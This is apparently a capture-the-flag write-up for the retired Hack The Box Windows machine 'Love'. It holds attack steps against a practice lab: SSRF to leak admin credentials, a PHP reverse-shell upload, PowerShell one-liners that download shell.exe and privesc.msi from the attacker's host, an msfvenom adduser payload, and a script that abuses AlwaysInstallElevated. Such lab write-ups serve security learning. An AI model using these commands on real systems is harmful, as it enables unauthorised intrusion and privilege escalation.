Name: Love
Release Date: 01 May 2021
Retire Date: 07 Aug 2021
OS: Windows
Base Points: Easy - Retired [0]
Tartofraise 00 days, 00 hours, 08 mins, 48 seconds
celesian 00 days, 00 hours, 18 mins, 12 seconds
Creator: pwnmeow
Pentest Workstation PDF: Love.pdf

Again, we start with sudo /home/kali/AutoRecon/src/autorecon/

Sidenote: Newer Kali releases no longer log in as root by default, so AutoRecon has to be run with sudo: its UDP scans (nmap -sU) need raw-socket privileges.

We have several open ports on this box, and many of them are running some form of web server. The SSL checks against HTTPS on TCP 443 reveal a few hostnames in the certificate, so let's begin by adding them to /etc/hosts.


sudo vi /etc/hosts


Now that we have that out of the way, we need to re-run Gobuster against the hostnames instead of the IP addresses. None of the Gobuster output is helpful on this box, though, so let's fall back to manual navigation. Browsing around turns up a Malware Scanner page (reached by clicking Demo).

So, port 5000 is forbidden when we browse to it directly, but the Malware Scanner fetches whatever we ask it to scan, which makes it a candidate for LFI or, more usefully, SSRF: if we point it at http://localhost:5000, the web server fetches the page from its own loopback interface, where the restriction does not apply. Sure enough, we DO get a response, and it just happens to contain admin credentials! Nice!


Vote Admin Creds: admin / @LoveIsInTheAir!!!!

Now that we have admin credentials for the Voting system, we log in. Next, let's check out searchsploit and see if there's anything we can use. Sure enough, php/webapps/ is an authenticated File Upload RCE exploit that should get us a foothold on the box. After a few tries on different ports, however, the exploit fails, so I'm going to show the manual method of exploiting the file upload. Looking around the admin portal, we see that we can update our profile picture, and since the system runs PHP, I'm going to upload a PHP reverse shell for Windows and then use it to pull down a Windows binary shell for a more stable session. I used this one:


I set a netcat listener on 1234 for the PHP shell, a web server on 8080 to serve shell.exe, and a second nc listener on 1337 for the binary. Upload windows-php-reverse-shell as the profile picture; once it calls back, run "powershell (New-Object Net.Webclient).DownloadFile('http://<YOUR TUN0 IP>:8080/shell.exe','shell.exe')", execute shell.exe, and the second listener catches a stable shell as phoebe.

C:\Users\Phoebe\Desktop>type user.txt
type user.txt




Running systeminfo and checking the usual interesting files, we find MySQL credentials for phoebe in C:\xampp\htdocs\omrs\includes\conn.php.


        <?php
        // C:\xampp\htdocs\omrs\includes\conn.php - database connection for the voting system
        $conn = new mysqli('localhost', 'phoebe', 'HTB#9826^(_', 'votesystem');

        if ($conn->connect_error) {
            die("Connection failed: " . $conn->connect_error);
        }


We keep enumerating the machine and, through WinPEAS, find that AlwaysInstallElevated is set to 1. That's an easy privilege-escalation vector, especially since WinPEAS gives us the URL to the method. One check worth doing before relying on it: the Windows Installer only honours the policy when AlwaysInstallElevated is 1 under both HKLM and HKCU; if only one hive is set, the MSI runs as the current user and the payload achieves nothing.

msfvenom -p windows/adduser --platform windows -a x64 USER=PWNED PASS='Password1!' -f msi -o privesc.msi


Upload it to the box using a slightly modified version of the earlier download command:


powershell (New-Object Net.Webclient).DownloadFile('http://<YOUR TUN0 IP>:8080/privesc.msi','privesc.msi')
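As an added example (not from the original writeup, and not WinPEAS output), the following PowerShell confirms the two registry values WinPEAS flags and, only if both are 1, installs the uploaded package and checks that the new user landed in Administrators. It assumes privesc.msi sits in the working directory, where the DownloadFile one-liner leaves it, and that the payload user is PWNED as in the msfvenom command above.

```powershell
# Added example: verify AlwaysInstallElevated in BOTH hives before using the MSI.
# If only one hive has the value set, msiexec runs the package as the current
# user and the adduser payload fails, since creating a local admin needs admin.

$installerKeys = @(
    'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
    'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
)

function Test-AlwaysInstallElevated {
    $results = foreach ($key in $installerKeys) {
        # A missing key or value yields $null, which we treat as "not set"
        $value = (Get-ItemProperty -Path $key -Name AlwaysInstallElevated `
                  -ErrorAction SilentlyContinue).AlwaysInstallElevated
        [PSCustomObject]@{ Key = $key; AlwaysInstallElevated = $value }
    }
    $results | Format-Table -AutoSize | Out-String | Write-Host
    $set = @($results | Where-Object { $_.AlwaysInstallElevated -eq 1 })
    return ($set.Count -eq $installerKeys.Count)
}

# Assumed location: privesc.msi was dropped here by the DownloadFile one-liner
$msi = Join-Path (Get-Location).Path 'privesc.msi'

if (Test-AlwaysInstallElevated) {
    # /i install, /quiet /qn no UI. With both policy values set, the Windows
    # Installer service performs the install as SYSTEM, so the embedded adduser
    # payload runs with full privileges. The package has no real product to
    # install, so msiexec typically reports a failure after the payload has run;
    # that is expected.
    Start-Process -FilePath msiexec.exe -ArgumentList '/quiet', '/qn', '/i', "`"$msi`"" -Wait
    # Confirm the result: PWNED should now be a member of Administrators
    net localgroup Administrators | Select-String -Pattern 'PWNED'
} else {
    Write-Warning 'AlwaysInstallElevated is not 1 in both hives; this vector will not work.'
}
```

Run it from the phoebe shell after the upload; the check costs nothing, and it saves chasing a payload that silently ran without elevation.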



Run the package on the box with msiexec /quiet /qn /i privesc.msi, which creates PWNED as a local administrator, then connect using


└─$ sudo python3 ./ PWNED:'Password1!'@ 


Grab the root.txt flag and we're on to the next :D


C:\WINDOWS\system32>type C:\Users\Administrator\Desktop\root.txt

C:\WINDOWS\system32>type C:\users\phoebe\desktop\user.txt